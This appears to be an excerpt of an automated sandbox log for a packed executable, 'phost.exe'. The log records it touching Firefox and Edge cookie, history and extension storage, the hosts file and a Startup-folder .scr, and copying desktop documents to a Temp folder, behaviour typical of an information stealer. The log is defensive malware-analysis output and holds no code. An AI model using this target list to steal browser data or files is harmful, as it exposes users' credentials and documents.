              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \System\Antivirus.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\HTAGVDFUIE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\HTAGVDFUIE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KATAXZVCPS.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KZWFNRXYKI.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.mp3 | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.mp3 | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KZWFNRXYKI.mp3 | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.mp3 | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.pdf | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.pdf | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KZWFNRXYKI.pdf | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.pdf | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LTKMYBSEYZ.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LTKMYBSEYZ.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\NIKHQAIQAU.png | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\NWTVCDUMOB.pdf | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\NWTVCDUMOB.pdf | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\NWTVCDUMOB.pdf | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\ONBQCLYSPU.docx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\ONBQCLYSPU.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UMMBDNEQBN.docx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UMMBDNEQBN.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.jpg | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UMMBDNEQBN.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UOOJJOZIRH.mp3 | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UOOJJOZIRH.mp3 | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UOOJJOZIRH.mp3 | VolumeInformation
Source: C:\Users\user\Desktop\phost.exe | Queries volume information: C:\Users\user\Desktop\UOOJJOZIRH.mp3 | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
